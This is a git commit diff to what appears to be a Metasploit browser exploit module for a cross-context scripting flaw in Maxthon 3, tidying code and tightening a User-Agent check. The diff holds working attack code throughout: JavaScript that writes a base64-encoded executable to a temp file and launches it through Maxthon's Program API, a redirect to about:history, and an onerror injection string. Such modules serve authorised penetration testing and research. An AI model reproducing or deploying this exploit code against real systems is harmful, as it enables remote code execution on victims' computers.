cleanup and user agent check

jvazquez-r7 · jvazquez-r7 · commit 1aaecbcf0ca9 · 2012-12-07T20:38:08.000+01:00
diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb
@@ -22,14 +22,16 @@ def initialize(info = {})
 				Injection in such privileged/trusted browser zone can be used to modify
 				configuration settings and execute arbitrary commands.
 			},
-			'License' => MSF_LICENSE,
+			'License' => BSD_LICENSE,
 			'Author' =>
-				[ 
+				[
 					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
+					'sinn3r', # msf module
+					'juan vazquez' # msf module
 				],
 			'References' =>
 				[
-					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
+						['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
 				],
 			'Payload' =>
 				{
@@ -38,35 +40,32 @@ def initialize(info = {})
 			'Platform'       => 'win',
 			'Targets' =>
 				[
-					['Maxthon 3 on Windows', {} ]
+					['Maxthon 3 (prior to 3.3) on Windows', {} ]
 				],
 			'DisclosureDate' => 'Nov 26 2012',
 			'DefaultTarget' => 0
 		))
 	end
 
-	def is_maxthon3?(request)
-		request.headers['User-Agent'] =~ /Maxthon\/3\.0/ ? true : false
-	end
-
 	def on_request_uri(cli, request)
-		if not is_maxthon3?(request)
-			print_error("Client isn't a Maxthon3 browser. Sending 404")
+
+		if request.headers['User-agent'] !~ /Maxthon\/3/ or request.headers['User-agent'] !~ /AppleWebKit\/534.12/
+			print_status("Sending 404 for User-Agent #{request.headers['User-agent']}")
 			send_not_found(cli)
+			return
 		end
 
-		html_hdr = %Q|
+			html_hdr = %Q^
 			<html>
 			<head>
 			<title>Loading</title>
-			|
-
-		html_ftr = %Q|
+			^
+		html_ftr = %Q^
 			</head>
 			<body >
 			<h1>Loading</h1>
 			</body></html>
-		|
+			^
 
 		case request.uri
 			when /\?jspayload/
@@ -83,37 +82,34 @@ def on_request_uri(cli, request)
 				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon.
 				# Then file can be launched via Program DOM API, because of this only Maxthon 3.1 versions are targeted.
 				# The Program DOM API isn't available on Maxthon 3.2 and upper versions.
-				content = %Q{
-					if(maxthon.program)
-					{
-					var fileTemp = new maxthon.io.File.createTempFile("test","exe");
-					var fileObj = maxthon.io.File(fileTemp);
-					maxthon.io.FileWriter(fileTemp);
-					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
-					maxthon.program.Program.launch(fileTemp.name_,"C:");
-					}
+				content = %Q|
+				if(maxthon.program)
+				{
+				var fileTemp = new maxthon.io.File.createTempFile("test","exe");
+				var fileObj = maxthon.io.File(fileTemp);
+				maxthon.io.FileWriter(fileTemp);
+				maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
+				maxthon.program.Program.launch(fileTemp.name_,"C:");
 				}
+				|
 
 			when /\?history/
 				js = %Q|
 				window.onload = function() {
 					location.href = "about:history";
 				}
 				|
-
 				content = %Q|
 				#{html_hdr}
 				<script>
 				#{js}
 				</script>
 				#{html_ftr}
 				|
-
 			when get_resource()
 				print_status("Sending #{self.name} payload for request #{request.uri}")
 
 				js = %Q|
-
 				url = location.href;
 				url2 = url + "?jspayload=1";
 				inj = "?history#%22/><img src=a onerror=%22"
